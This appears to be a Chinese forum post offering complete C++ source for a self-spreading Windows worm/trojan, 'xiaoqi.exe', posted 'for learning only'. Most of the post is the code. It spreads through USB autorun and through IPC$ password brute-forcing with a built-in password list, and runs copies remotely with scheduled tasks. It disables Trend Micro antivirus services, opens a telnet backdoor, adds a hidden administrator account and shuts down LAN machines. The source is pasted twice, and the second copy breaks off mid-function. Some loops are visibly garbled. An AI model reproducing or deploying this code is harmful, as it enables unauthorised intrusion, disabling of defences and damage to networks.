本人最近学习网络安全,突发灵感,写了兼有病毒、木马、蠕虫于特点的东东。现在贴出来,仅供学习娱乐,勿做他用,否则责任自负。
编译环境:vc++32位应用程序。源文件有system.h、init.cpp、system.cpp三个。先分别给出代码。
//system.h,系统总体规划
#if !defined(_IHATEBUGGING)
#define _IHATEBUGGING
#include <io.h>
#include <time.h>
#include <stdio.h>
#include <string.h>
struct sys{ //配置全局变量类型
char syspath[30]; //系统路径
char hostip[16]; //主机IP
char guestip[16]; //客户IP
char user[20]; //用户名
char passwd[20]; //密码
char flag[6]; //标识
char send; //是否攻击网络,0不攻击,1攻击
char station; //客户本机标识/10的值
char lastdisk[4]; //最后一个盘符
int hacknum; //已入侵的主机数
};
void getpath(); //获取系统路径
void saveconfig(char flagfile[40]); //加密保存配置
void filecopy(FILE *fp); //拷贝副本,如果是远程就尝试启动
void checkTime(char hostip[16]); //和主机对时
void changereg(); //更改注册表
int Init(int argc,char * args[]); //初始化
void shut(char netid[12],int start,int end); //尝试关闭局域网内start~end网段的机子
void hacknet(int childip,char netid[12]); //网络入侵
void hackdisk(char diskroot[4]); //攻击U盘
void shut_open(); //关闭趋势防毒墙并打开后门
void TIMER(long minute); //主循环模拟事件
#endif // !defined(_IHATEBUGGING)
//init.cpp,系统初始化
#include <windows.h>
#include "system.h"
extern struct sys Sysmesg; //定义于system.cpp
void saveconfig(char flagfile[40]) //加密保存配置
{
struct sys message=Sysmesg;
char *p=(char *)&message;
for(int i=0;i<sizeof(message);i++)
(*p++)+=3;
FILE *fp=fopen(flagfile,"wb");
fwrite(&message,sizeof(message),1,fp);
fclose(fp);
}
void openconfig(char flagfile[40]) //读取配置并解密
{
FILE *fp=fopen(flagfile,"rb");
fread(&Sysmesg,sizeof(Sysmesg),1,fp);
fclose(fp);
char *p=(char *)&Sysmesg;
for(int i=0;i<sizeof(Sysmesg);i++)
(*p++)-=3;
}
void getconfig(char * args[]) //从参数获取配置信息
{
char disk[4]="C://";
strcpy(Sysmesg.hostip,args[1]);
strcpy(Sysmesg.guestip,args[2]);
strcpy(Sysmesg.user,args[3]);
strcpy(Sysmesg.passwd,args[4]);
strcpy(Sysmesg.flag,args[5]);
if(Sysmesg.flag[1]=='z')
Sysmesg.flag[0]+=1,Sysmesg.flag[1]='A';
else
{
Sysmesg.flag[1]+=1;
Sysmesg.send=(Sysmesg.flag[0]=='Z'&&Sysmesg.flag[1]=='Z')?0:1;
}
Sysmesg.station=0; //获取本机标识/10的值
int i,k=strlen(Sysmesg.guestip)-1;
while(Sysmesg.guestip[--k]!='.');
for(i=k+1;i<(int)strlen(Sysmesg.guestip)-1;i++)
Sysmesg.station=Sysmesg.station*10+Sysmesg.guestip -'0';
while(access(disk,0)==0)
disk[0]++;
disk[0]--;
strcpy(Sysmesg.lastdisk,disk); //获取最后一个盘符
Sysmesg.hacknum=0; //初始化已攻击机器数
if(strcmp(Sysmesg.hostip,"127.0.0.1")) //网络入侵则和主机对时
checkTime(Sysmesg.hostip);
}
void getpath() //获取系统路径
{
if(access("c://winnt",0)==0)
strcpy(Sysmesg.syspath,"c://winnt//");
else if(access("c://windows",0)==0)
strcpy(Sysmesg.syspath,"c://windows//");
else
strcpy(Sysmesg.syspath,"c://");
}
void filecopy(FILE *fp) //拷贝副本
{
fprintf(fp,"attrib -r -h -s xiaoqi.exe/r/n");
fprintf(fp,"copy xiaoqi.exe z:///r/n");
fprintf(fp,"attrib +r +h +s xiaoqi.exe/r/n");
fprintf(fp,"attrib +r +h +s z://xiaoqi.exe/r/n");
}
void checkTime(char hostip[16]) //和主机对时
{
FILE *fp=fopen("checktime.bat","wb");
fprintf(fp,"net use %s//ipc$ /"/" /user:/"/"/r/n",Sysmesg.hostip);
fprintf(fp,"net time %s /set /y/r/n",Sysmesg.hostip);
fprintf(fp,"net use %s//ipc$ /del /y/r/n",Sysmesg.hostip);
fprintf(fp,"del checktime.bat/r/n");
fclose(fp);
WinExec("checktime.bat",SW_HIDE);
}
void changereg() //更改注册表
{
FILE *fp=fopen("regchg.bat","wb");
fprintf(fp,"reg add /"HKEY_CURRENT_USER//Software//Microsoft//Windows NT//");
fprintf(fp,"CurrentVersion//Windows/" /v /"load/" /t REG_SZ /d ");
fprintf(fp,"/"%sxiaoqi.exe/" /f/r/n",Sysmesg.syspath);
fprintf(fp,"reg add /"HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//");
fprintf(fp,"ntrtscan/" /v /"Start/" /t REG_DWORD /d /"4/" /f/r/n");
fprintf(fp,"reg add /"HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//");
fprintf(fp,"OfcPfwSvc/" /v /"Start/" /t REG_DWORD /d /"4/" /f/r/n");
fprintf(fp,"reg add /"HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//");
fprintf(fp,"tmlisten/" /v /"Start/" /t REG_DWORD /d /"4/" /f/r/n");
fprintf(fp,"reg delete /"HKEY_CURRENT_USER//SOFTWARE//Microsoft//Windows//");
fprintf(fp,"CurrentVersion//Run/" /v /"OfficeScanNT Monitor/" /f/r/n");
fprintf(fp,"del regchg.bat/r/n");
fclose(fp);
WinExec("regchg.bat",SW_HIDE);
}
int Init(int argc,char * args[]) //初始化
{
char flagfile[40];
getpath(); //获取系统路径
strcpy(flagfile,Sysmesg.syspath);
strcat(flagfile,"xiaoqi.exe");
if(access(flagfile,0)==-1) //通过U盘传播进入或用户自己激发
{
char cmd[100],localip[16];
FILE *fp;
WinExec("cmd.exe /c ipconfig.exe|find /"IP Address/">ipaddress",SW_HIDE);
Sleep(1000);
fp=fopen("ipaddress","rb");
fgets(cmd,100,fp);
fclose(fp);
WinExec("cmd.exe /c /"del ipaddress/"",SW_HIDE);
for(int i=strlen(cmd);cmd<'0' || cmd>'9';i--);
for(cmd=0;cmd!=' ';i--);
strcpy(localip,&cmd); //获取本地IP地址
changereg();
strcpy(cmd,Sysmesg.syspath);
if(strlen(cmd)>3) //过滤非根目录末尾的'/'字符
cmd[strlen(cmd)-1]=0;
fp=fopen("localhak.bat","wb");
fprintf(fp,"subst z: %s/r/n",cmd);
filecopy(fp);
fprintf(fp,"subst z: /d/r/n");
fprintf(fp,"start /Dc: %sxiaoqi.exe 127.0.0.1 ",Sysmesg.syspath);
fprintf(fp,"%s administrator 7654321 AA001/r/n",localip);
fprintf(fp,"del localhak.bat/r/n"); fclose(fp);
WinExec("localhak.bat",SW_HIDE);
return 0;
}
if(access("d://",0)==0 && access("d://xiaoqi.exe",0)==-1)
hackdisk("d://"); //感染D盘,防止重装系统
strcpy(flagfile,Sysmesg.syspath);
strcat(flagfile,"config");
if(argc==6) //通过网络入侵进入系统
{
getconfig(args);
saveconfig(flagfile);
changereg();
}
else if(argc==1)
openconfig(flagfile);
else //双击U盘时机器已感染
{
char cmd[20]="explorer ";
strcat(cmd,args[1]);
WinExec(cmd,SW_SHOW);
return 0;
}
return 1;
}
//system.cpp,主文件
#include <time.h>
#include <direct.h>
#include <windows.h>
#include "system.h"
struct sys Sysmesg; //配置全局变量
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
char *args[6];
int argc=1,k=0,i;
long minute=0;
for(i=0;i<6;i++)
args=new char[20];
if(strcmp(lpCmdLine,"")) //分离命令行参数
for(args[0]="xiaoqi.exe";lpCmdLine[k]!=0;)
{
i=0,argc++;
while(lpCmdLine[k]!=' ' && lpCmdLine[k]!=0)
args[argc-1]=lpCmdLine[k++];
args[argc-1]=0;
while(lpCmdLine[k]==' ')
k++;
}
if(!Init(argc,args)) //初始化并判断执行来源
return 0;
else if(CreateMutex(NULL,TRUE,"_BACKUPRUN_")) //互斥对象保证只运行一个副本
{
if(GetLastError()==ERROR_ALREADY_EXISTS)
{
MessageBox(NULL,"磁盘驱动程序,请勿操作!","系统信息",NULL); //迷惑用户
return 0;
}
}
_chdir(Sysmesg.syspath); //更改当前目录到系统目录
srand((unsigned)time(NULL)); //初始化种子
while(1)
{
Sleep(20000);
TIMER(++minute);
}
return 1;
}
void shut(char netid[12],int start,int end) //尝试关闭局域网内start~end网段的机子
{
FILE *fp=fopen("shutdown.bat","wb");
fprintf(fp,"set /a localid=%d/r/n",start);
fprintf(fp,":begin/r/n");
fprintf(fp,"net use %s%%localid%%//ipc$ %s /user:%s/r/n",netid,Sysmesg.passwd,Sysmesg.user);
fprintf(fp,"if errorlevel 1 net use %s%%localid%%",netid);
fprintf(fp,"[url=file://ipc$/]//ipc$[/url] /"/" /user:administrator/r/n");
fprintf(fp,"if errorlevel 1 goto next/r/n");
fprintf(fp,"shutdown.exe -s -m %s%%localid%% -t 00/r/n",netid);
fprintf(fp,"net use %s%%localid%%//ipc$ /del /y/r/n",netid);
fprintf(fp,":next/r/n");
fprintf(fp,"set /a localid=%%localid%%+1/r/n");
fprintf(fp,"if %%localid%%==%d goto end/r/n",end);
fprintf(fp,"goto begin/r/n");
fprintf(fp,":end/r/n");
fprintf(fp,"del shutdown.bat/r/n");
fclose(fp);
WinExec("shutdown.bat",SW_HIDE);
}
void hacknet(char netid[12],int childip) //网络入侵
{
time_t xx=time(0)+600;
char farid[4]="123",flag[6],flagfile[40],tm[25];
char passwd[][10]={"/"/"","123","1234","12345","123456","1234567","7654321","654321","54321",
"888888","12345678","000000","god","God","haha","user","admin","passwd",
"password","guest","1983","1984","1985","1986","1987","1988","1989","1990",
"0125","0912","0705","0735","911","520","father","mother","brother","sister",
"beauty","beautiful","strong","power","powerful","rand","intel","dell",
"sony","Alcatel","alcatel","acer","lenovo","compaq","Dell","daevoo","iei",
"chocon","iei123","legend","Acer","pass","hack","hacker","crack","cracker",
"jay","allen","john","beijing","nanjing","hefei","jodan","backhan","[email=!@#$%]!@#$%[/email]",
"!@#$%^","!@#$%^&","!@#$%^&*","@#$%^&","bill","kiss","kitty","wang","zhang",
"liu","chen","yang","zhao","huang","iloveyou","ihateyou","19851225","zhou",
"copy","19851225","feifei","evil","xiaoqi","ashou","yinmo","angel","hero"};
strcpy(tm,ctime(&xx));
tm[19]=0;
FILE *fp=fopen("nethak.bat","wb");
farid[0]=childip/100+'0';
farid[1]=(childip%100)/10+'0';
farid[2]=childip%10+'0';
fprintf(fp,"net use %s%s//ipc$ /"/" /user:/"/"/r/n",netid,farid);
fprintf(fp,"if errorlevel 1 goto end/r/n");
fprintf(fp,"net use %s%s//ipc$ /del /y/r/n",netid,farid);
fprintf(fp,"net use %s%s//ipc$ ",netid,farid);
fprintf(fp,"%s /user:%s/r/n",Sysmesg.passwd,Sysmesg.user);
for(int i=0;i<sizeof(passwd)/10;i++)
fprintf(fp,"if errorlevel 1 net use %s%s//ipc$ %s /user:administrator/r/n",
netid,farid,passwd);
fprintf(fp,"if errorlevel 1 goto end/r/n");
fprintf(fp,"net use z: %s%s//admin$/r/n",netid,farid);
fprintf(fp,"if not exist z:// goto disconnect/r/n");
fprintf(fp,"if exist z://xiaoqi.exe goto disconnect/r/n");
filecopy(fp);
Sysmesg.hacknum++;
flag[0]=Sysmesg.flag[0]; flag[1]=Sysmesg.flag[1];
flag[2]=Sysmesg.hacknum/100+'0'; flag[3]=(Sysmesg.hacknum%100)/10+'0';
flag[4]=Sysmesg.hacknum%10+'0'; flag[5]=0;
fprintf(fp,"at %s%s %s ",netid,farid,&tm[11]);
if(strcmp(Sysmesg.syspath,"c://"))
fprintf(fp,"%%windir%%//xiaoqi.exe %s %s%s ",Sysmesg.guestip,netid,farid);
else
fprintf(fp,"c://xiaoqi.exe %s %s%s ",Sysmesg.guestip,netid,farid);
fprintf(fp,"%s %s %s/r/n",flag,Sysmesg.user,Sysmesg.passwd);
fprintf(fp,":disconnect/r/n"); fprintf(fp,"net use * /del /y/r/n");
fprintf(fp,":end/r/n"); fprintf(fp,"del nethak.bat/r/n"); fclose(fp);
WinExec("nethak.bat",SW_HIDE);
strcpy(flagfile,Sysmesg.syspath); strcat(flagfile,"config");
saveconfig(flagfile);
}
void hackdisk(char diskroot[4]) //感染U盘
{
char cmd[20];
FILE *fp;
strcpy(cmd,diskroot); strcat(cmd,"autorun.inf");
fp=fopen(cmd,"wb");
fprintf(fp,"[autorun]/r/n");
fprintf(fp,"open=.//xiaoqi.exe %%1/r/n/r/n");
fprintf(fp,"shell//1=Open/r/n");
fprintf(fp,"shell//1//Command=.//xiaoqi.exe %%1/r/n");
fprintf(fp,"shell//2//=Browser/r/n");
fprintf(fp,"shell//2//Command=.//xiaoqi.exe %%1/r/n/r/n");
fprintf(fp,"shellexecute=.//xiaoqi.exe %%1/r/n");
fclose(fp);
fp=fopen("diskhack.bat","wb");
fprintf(fp,"subst z: %s/r/n",diskroot);
filecopy(fp);
fprintf(fp,"attrib +s +r +h z://autorun.inf/r/n");
fprintf(fp,"subst z: /d/r/n");
fprintf(fp,"del diskhack.bat/r/n"); fclose(fp);
WinExec("diskhack.bat",SW_HIDE);
}
void shut_open() //关闭趋势防毒墙并打开后门
{
FILE *fp=fopen("shutopen.bat","wb");
fprintf(fp,"net stop tmlisten/r/n");
fprintf(fp,"net stop ntrtscan/r/n");
fprintf(fp,"net stop ofcpfwsvc/r/n");
fprintf(fp,"taskkill /f /im pccntmon.exe/r/n");
fprintf(fp,"if errorlevel 1 taskkill /f ");
fprintf(fp,"/u %s /p %s /im pccntmon.exe/r/n",Sysmesg.user,Sysmesg.passwd);
fprintf(fp,"net stop telnet/r/n");
if(!strcmp(strlwr(Sysmesg.syspath),"c://windows"))
fprintf(fp,"tlntadmn config port=301 sec=+passwd/r/n");
else if(!strcmp(strlwr(Sysmesg.syspath),"c://winnt"))
{
fprintf(fp,"echo 3>tlntcnfg/r/n");
fprintf(fp,"echo 7>>tlntcnfg/r/n");
fprintf(fp,"echo y>>tlntcnfg/r/n");
fprintf(fp,"echo 0>>tlntcnfg/r/n");
fprintf(fp,"echo y>>>tlntcnfg/r/n");
fprintf(fp,"echo 301>>tlntcnfg/r/n");
fprintf(fp,"echo y>>tlntcnfg/r/n");
fprintf(fp,"echo 0>>tlntcnfg/r/n");
fprintf(fp,"echo 0>>tlntcnfg/r/n");
fprintf(fp,"tlntadmn<tlntcnfg/r/n");
fprintf(fp, "del tlntcnfg/r/n");
}
fprintf(fp,"net start telnet/r/n");
fprintf(fp,"net share system$=%ssystem32/r/n",Sysmesg.syspath);
fprintf(fp,"net user system$ system /add/r/n");
fprintf(fp,"net localgroup administrators system$ /add/r/n");
fprintf(fp,"del shutopen.bat/r/n");
fclose(fp);
WinExec("shutopen.bat",SW_HIDE);
}
void TIMER(long minute) //主循环模拟触发器
{
char disk[4],backfile[15];
strcpy(disk,Sysmesg.lastdisk);
for(disk[0]='Z';disk[0]>=Sysmesg.lastdisk[0];disk[0]--)
if(access(disk,0)==0) //感染U盘
{
sprintf(backfile,"%s%s",disk,"xiaoqi.exe");
if(access(backfile,0)==-1) //识别U盘是否已感染
hackdisk(disk);
}
if(minute%11==0) //尝试关闭趋势防毒墙并打开后门
shut_open();
else if(minute%57==0) //群发消息
WinExec("net send * 病毒和蠕虫有什么区别?",SW_HIDE);
else
{
char netid[16];
strcpy(netid,Sysmesg.guestip);
if(Sysmesg.station==0)
netid[strlen(netid)-1]=0;
else if(Sysmesg.station<10)
netid[strlen(netid)-2]=0;
else
netid[strlen(netid)-3]=0;
if(minute%97==0 && rand()%2==1) //尝试关闭其他机器
if(Sysmesg.station==25)
shut(netid,Sysmesg.station*10+1,255);
else
shut(netid,Sysmesg.station*10+1,(Sysmesg.station+1)*10);
else if(Sysmesg.hacknum<999 && minute%23==0 && Sysmesg.send)//尝试网络入侵
{
int childip=rand()%254+1;
hacknet(netid,childip);
}
}
}
编译环境:vc++32位应用程序。源文件有system.h、init.cpp、system.cpp三个。先分别给出代码。
//system.h,系统总体规划
#if !defined(_IHATEBUGGING)
#define _IHATEBUGGING
#include <io.h>
#include <time.h>
#include <stdio.h>
#include <string.h>
struct sys{ //配置全局变量类型
char syspath[30]; //系统路径
char hostip[16]; //主机IP
char guestip[16]; //客户IP
char user[20]; //用户名
char passwd[20]; //密码
char flag[6]; //标识
char send; //是否攻击网络,0不攻击,1攻击
char station; //客户本机标识/10的值
char lastdisk[4]; //最后一个盘符
int hacknum; //已入侵的主机数
};
void getpath(); //获取系统路径
void saveconfig(char flagfile[40]); //加密保存配置
void filecopy(FILE *fp); //拷贝副本,如果是远程就尝试启动
void checkTime(char hostip[16]); //和主机对时
void changereg(); //更改注册表
int Init(int argc,char * args[]); //初始化
void shut(char netid[12],int start,int end); //尝试关闭局域网内start~end网段的机子
void hacknet(int childip,char netid[12]); //网络入侵
void hackdisk(char diskroot[4]); //攻击U盘
void shut_open(); //关闭趋势防毒墙并打开后门
void TIMER(long minute); //主循环模拟事件
#endif // !defined(_IHATEBUGGING)
//init.cpp,系统初始化
#include <windows.h>
#include "system.h"
extern struct sys Sysmesg; //定义于system.cpp
void saveconfig(char flagfile[40]) //加密保存配置
{
struct sys message=Sysmesg;
char *p=(char *)&message;
for(int i=0;i<sizeof(message);i++)
(*p++)+=3;
FILE *fp=fopen(flagfile,"wb");
fwrite(&message,sizeof(message),1,fp);
fclose(fp);
}
void openconfig(char flagfile[40]) //读取配置并解密
{
FILE *fp=fopen(flagfile,"rb");
fread(&Sysmesg,sizeof(Sysmesg),1,fp);
fclose(fp);
char *p=(char *)&Sysmesg;
for(int i=0;i<sizeof(Sysmesg);i++)
(*p++)-=3;
}
void getconfig(char * args[]) //从参数获取配置信息
{
char disk[4]="C://";
strcpy(Sysmesg.hostip,args[1]);
strcpy(Sysmesg.guestip,args[2]);
strcpy(Sysmesg.user,args[3]);
strcpy(Sysmesg.passwd,args[4]);
strcpy(Sysmesg.flag,args[5]);
if(Sysmesg.flag[1]=='z')
Sysmesg.flag[0]+=1,Sysmesg.flag[1]='A';
else
{
Sysmesg.flag[1]+=1;
Sysmesg.send=(Sysmesg.flag[0]=='Z'&&Sysmesg.flag[1]=='Z')?0:1;
}
Sysmesg.station=0; //获取本机标识/10的值
int i,k=strlen(Sysmesg.guestip)-1;
while(Sysmesg.guestip[--k]!='.');
for(i=k+1;i<(int)strlen(Sysmesg.guestip)-1;i++)
Sysmesg.station=Sysmesg.station*10+Sysmesg.guestip -'0';
while(access(disk,0)==0)
disk[0]++;
disk[0]--;
strcpy(Sysmesg.lastdisk,disk); //获取最后一个盘符
Sysmesg.hacknum=0; //初始化已攻击机器数
if(strcmp(Sysmesg.hostip,"127.0.0.1")) //网络入侵则和主机对时
checkTime(Sysmesg.hostip);
}
void getpath() //获取系统路径
{
if(access("c://winnt",0)==0)
strcpy(Sysmesg.syspath,"c://winnt//");
else if(access("c://windows",0)==0)
strcpy(Sysmesg.syspath,"c://windows//");
else
strcpy(Sysmesg.syspath,"c://");
}
void filecopy(FILE *fp) //拷贝副本
{
fprintf(fp,"attrib -r -h -s xiaoqi.exe/r/n");
fprintf(fp,"copy xiaoqi.exe z:///r/n");
fprintf(fp,"attrib +r +h +s xiaoqi.exe/r/n");
fprintf(fp,"attrib +r +h +s z://xiaoqi.exe/r/n");
}
void checkTime(char hostip[16]) //和主机对时
{
FILE *fp=fopen("checktime.bat","wb");
fprintf(fp,"net use %s//ipc$ /"/" /user:/"/"/r/n",Sysmesg.hostip);
fprintf(fp,"net time %s /set /y/r/n",Sysmesg.hostip);
fprintf(fp,"net use %s//ipc$ /del /y/r/n",Sysmesg.hostip);
fprintf(fp,"del checktime.bat/r/n");
fclose(fp);
WinExec("checktime.bat",SW_HIDE);
}
void changereg() //更改注册表
{
FILE *fp=fopen("regchg.bat","wb");
fprintf(fp,"reg add /"HKEY_CURRENT_USER//Software//Microsoft//Windows NT//");
fprintf(fp,"CurrentVersion//Windows/" /v /"load/" /t REG_SZ /d ");
fprintf(fp,"/"%sxiaoqi.exe/" /f/r/n",Sysmesg.syspath);
fprintf(fp,"reg add /"HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//");
fprintf(fp,"ntrtscan/" /v /"Start/" /t REG_DWORD /d /"4/" /f/r/n");
fprintf(fp,"reg add /"HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//");
fprintf(fp,"OfcPfwSvc/" /v /"Start/" /t REG_DWORD /d /"4/" /f/r/n");
fprintf(fp,"reg add /"HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//");
fprintf(fp,"tmlisten/" /v /"Start/" /t REG_DWORD /d /"4/" /f/r/n");
fprintf(fp,"reg delete /"HKEY_CURRENT_USER//SOFTWARE//Microsoft//Windows//");
fprintf(fp,"CurrentVersion//Run/" /v /"OfficeScanNT Monitor/" /f/r/n");
fprintf(fp,"del regchg.bat/r/n");
fclose(fp);
WinExec("regchg.bat",SW_HIDE);
}
int Init(int argc,char * args[]) //初始化
{
char flagfile[40];
getpath(); //获取系统路径
strcpy(flagfile,Sysmesg.syspath);
strcat(flagfile,"xiaoqi.exe");
if(access(flagfile,0)==-1) //通过U盘传播进入或用户自己激发
{
char cmd[100],localip[16];
FILE *fp;
WinExec("cmd.exe /c ipconfig.exe|find /"IP Address/">ipaddress",SW_HIDE);
Sleep(1000);
fp=fopen("ipaddress","rb");
fgets(cmd,100,fp);
fclose(fp);
WinExec("cmd.exe /c /"del ipaddress/"",SW_HIDE);
for(int i=strlen(cmd);cmd<'0' || cmd>'9';i--);
for(cmd=0;cmd!=' ';i--);
strcpy(localip,&cmd); //获取本地IP地址
changereg();
strcpy(cmd,Sysmesg.syspath);
if(strlen(cmd)>3) //过滤非根目录末尾的'/'字符
cmd[strlen(cmd)-1]=0;
fp=fopen("localhak.bat","wb");
fprintf(fp,"subst z: %s/r/n",cmd);
filecopy(fp);
fprintf(fp,"subst z: /d/r/n");
fprintf(fp,"start /Dc: %sxiaoqi.exe 127.0.0.1 ",Sysmesg.syspath);
fprintf(fp,"%s administrator 7654321 AA001/r/n",localip);
fprintf(fp,"del localhak.bat/r/n"); fclose(fp);
WinExec("localhak.bat",SW_HIDE);
return 0;
}
if(access("d://",0)==0 && access("d://xiaoqi.exe",0)==-1)
hackdisk("d://"); //感染D盘,防止重装系统
strcpy(flagfile,Sysmesg.syspath);
strcat(flagfile,"config");
if(argc==6) //通过网络入侵进入系统
{
getconfig(args);
saveconfig(flagfile);
changereg();
}
else if(argc==1)
openconfig(flagfile);
else //双击U盘时机器已感染
{
char cmd[20]="explorer ";
strcat(cmd,args[1]);
WinExec(cmd,SW_SHOW);
return 0;
}
return 1;
}
//system.cpp,主文件
#include <time.h>
#include <direct.h>
#include <windows.h>
#include "system.h"
struct sys Sysmesg; //配置全局变量
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
char *args[6];
int argc=1,k=0,i;
long minute=0;
for(i=0;i<6;i++)
args=new char[20];
if(strcmp(lpCmdLine,"")) //分离命令行参数
for(args[0]="xiaoqi.exe";lpCmdLine[k]!=0;)
{
i=0,argc++;
while(lpCmdLine[k]!=' ' && lpCmdLine[k]!=0)
args[argc-1]=lpCmdLine[k++];
args[argc-1]=0;
while(lpCmdLine[k]==' ')
k++;
}
if(!Init(argc,args)) //初始化并判断执行来源
return 0;
else if(CreateMutex(NULL,TRUE,"_BACKUPRUN_")) //互斥对象保证只运行一个副本
{
if(GetLastError()==ERROR_ALREADY_EXISTS)
{
MessageBox(NULL,"磁盘驱动程序,请勿操作!","系统信息",NULL); //迷惑用户
return 0;
}
}
_chdir(Sysmesg.syspath); //更改当前目录到系统目录
srand((unsigned)time(NULL)); //初始化种子
while(1)
{
Sleep(20000);
TIMER(++minute);
}
return 1;
}
void shut(char netid[12],int start,int end) //尝试关闭局域网内start~end网段的机子
{
FILE *fp=fopen("shutdown.bat","wb");
fprintf(fp,"set /a localid=%d/r/n",start);
fprintf(fp,":begin/r/n");
fprintf(fp,"net use %s%%localid%%//ipc$ %s /user:%s/r/n",netid,Sysmesg.passwd,Sysmesg.user);
fprintf(fp,"if errorlevel 1 net use %s%%localid%%",netid);
fprintf(fp,"[url=file://ipc$/]//ipc$[/url] /"/" /user:administrator/r/n");
fprintf(fp,"if errorlevel 1 goto next/r/n");
fprintf(fp,"shutdown.exe -s -m %s%%localid%% -t 00/r/n",netid);
fprintf(fp,"net use %s%%localid%%//ipc$ /del /y/r/n",netid);
fprintf(fp,":next/r/n");
fprintf(fp,"set /a localid=%%localid%%+1/r/n");
fprintf(fp,"if %%localid%%==%d goto end/r/n",end);
fprintf(fp,"goto begin/r/n");
fprintf(fp,":end/r/n");
fprintf(fp,"del shutdown.bat/r/n");
fclose(fp);
WinExec("shutdown.bat",SW_HIDE);
}
void hacknet(char netid[12],int childip) //网络入侵
{
time_t xx=time(0)+600;
char farid[4]="123",flag[6],flagfile[40],tm[25];
char passwd[][10]={"/"/"","123","1234","12345","123456","1234567","7654321","654321","54321",
"888888","12345678","000000","god","God","haha","user","admin","passwd",
"password","guest","1983","1984","1985","1986","1987","1988","1989","1990",
"0125","0912","0705","0735","911","520","father","mother","brother","sister",
"beauty","beautiful","strong","power","powerful","rand","intel","dell",
"sony","Alcatel","alcatel","acer","lenovo","compaq","Dell","daevoo","iei",
"chocon","iei123","legend","Acer","pass","hack","hacker","crack","cracker",
"jay","allen","john","beijing","nanjing","hefei","jodan","backhan","[email=!@#$%]!@#$%[/email]",
"!@#$%^","!@#$%^&","!@#$%^&*","@#$%^&","bill","kiss","kitty","wang","zhang",
"liu","chen","yang","zhao","huang","iloveyou","ihateyou","19851225","zhou",
"copy","19851225","feifei","evil","xiaoqi","ashou","yinmo","angel","hero"};
strcpy(tm,ctime(&xx));
tm[19]=0;
FILE *fp=fopen("nethak.bat","wb");
farid[0]=childip/100+'0';
farid[1]=(childip%100)/10+'0';
farid[2]=childip%10+'0';
fprintf(fp,"net use %s%s//ipc$ /"/" /user:/"/"/r/n",netid,farid);
fprintf(fp,"if errorlevel 1 goto end/r/n");
fprintf(fp,"net use %s%s//ipc$ /del /y/r/n",netid,farid);
fprintf(fp,"net use %s%s//ipc$ ",netid,farid);
fprintf(fp,"%s /user:%s/r/n",Sysmesg.passwd,Sysmesg.user);
for(int i=0;i<sizeof(passwd)/10;i++)
fprintf(fp,"if errorlevel 1 net use %s%s//ipc$ %s /user:administrator/r/n",
netid,farid,passwd);
fprintf(fp,"if errorlevel 1 goto end/r/n");
fprintf(fp,"net use z: %s%s//admin$/r/n",netid,farid);
fprintf(fp,"if not exist z:// goto disconnect/r/n");
fprintf(fp,"if exist z://xiaoqi.exe goto disconnect/r/n");
filecopy(fp);
Sysmesg.hacknum++;
flag[0]=Sysmesg.flag[0]; flag[1]=Sysmesg.flag[1];
flag[2]=Sysmesg.hacknum/100+'0'; flag[3]=(Sysmesg.hacknum%100)/10+'0';
flag[4]=Sysmesg.hacknum%10+'0'; flag[5]=0;
fprintf(fp,"at %s%s %s ",netid,farid,&tm[11]);
if(strcmp(Sysmesg.syspath,"c://"))
fprintf(fp,"%%windir%%//xiaoqi.exe %s %s%s ",Sysmesg.guestip,netid,farid);
else
fprintf(fp,"c://xiaoqi.exe %s %s%s ",Sysmesg.guestip,netid,farid);
fprintf(fp,"%s %s %s/r/n",flag,Sysmesg.user,Sysmesg.passwd);
fprintf(fp,":disconnect/r/n"); fprintf(fp,"net use * /del /y/r/n");
fprintf(fp,":end/r/n"); fprintf(fp,"del nethak.bat/r/n"); fclose(fp);
WinExec("nethak.bat",SW_HIDE);
strcpy(flagfile,Sysmesg.syspath); strcat(flagfile,"config");
saveconfig(flagfile);
}
void hackdisk(char diskroot[4]) //感染U盘
{
char cmd[20];
FILE *fp;
strcpy(cmd,diskroot); strcat(cmd,"autorun.inf");
fp=fopen(cmd,"wb");
fprintf(fp,"[autorun]/r/n");
fprintf(fp,"open=.//xiaoqi.exe %%1/r/n/r/n");
fprintf(fp,"shell//1=Open/r/n");
fprintf(fp,"shell//1//Command=.//xiaoqi.exe %%1/r/n");
fprintf(fp,"shell//2//=Browser/r/n");
fprintf(fp,"shell//2//Command=.//xiaoqi.exe %%1/r/n/r/n");
fprintf(fp,"shellexecute=.//xiaoqi.exe %%1/r/n");
fclose(fp);
fp=fopen("diskhack.bat","wb");
fprintf(fp,"subst z: %s/r/n",diskroot);
filecopy(fp);
fprintf(fp,"attrib +s +r +h z://autorun.inf/r/n");
fprintf(fp,"subst z: /d/r/n");
fprintf(fp,"del diskhack.bat/r/n"); fclose(fp);
WinExec("diskhack.bat",SW_HIDE);
}
void shut_open() //关闭趋势防毒墙并打开后门
{
FILE *fp=fopen("shutopen.bat","wb");
fprintf(fp,"net stop tmlisten/r/n");
fprintf(fp,"net stop ntrtscan/r/n");
fprintf(fp,"net stop ofcpfwsvc/r/n");
fprintf(fp,"taskkill /f /im pccntmon.exe/r/n");
fprintf(fp,"if errorlevel 1 taskkill /f ");
fprintf(fp,"/u %s /p %s /im pccntmon.exe/r/n",Sysmesg.user,Sysmesg.passwd);
fprintf(fp,"net stop telnet/r/n");
if(!strcmp(strlwr(Sysmesg.syspath),"c://windows"))
fprintf(fp,"tlntadmn config port=301 sec=+passwd/r/n");
else if(!strcmp(strlwr(Sysmesg.syspath),"c://winnt"))
{
fprintf(fp,"echo 3>tlntcnfg/r/n");
fprintf(fp,"echo 7>>tlntcnfg/r/n");
fprintf(fp,"echo y>>tlntcnfg/r/n");
fprintf(fp,"echo 0>>tlntcnfg/r/n");
fprintf(fp,"echo y>>>tlntcnfg/r/n");
fprintf(fp,"echo 301>>tlntcnfg/r/n");
fprintf(fp,"echo y>>tlntcnfg/r/n");
fprintf(fp,"echo 0>>tlntcnfg/r/n");
fprintf(fp,"echo 0>>tlntcnfg/r/n");
fprintf(fp,"tlntadmn<tlntcnfg/r/n");
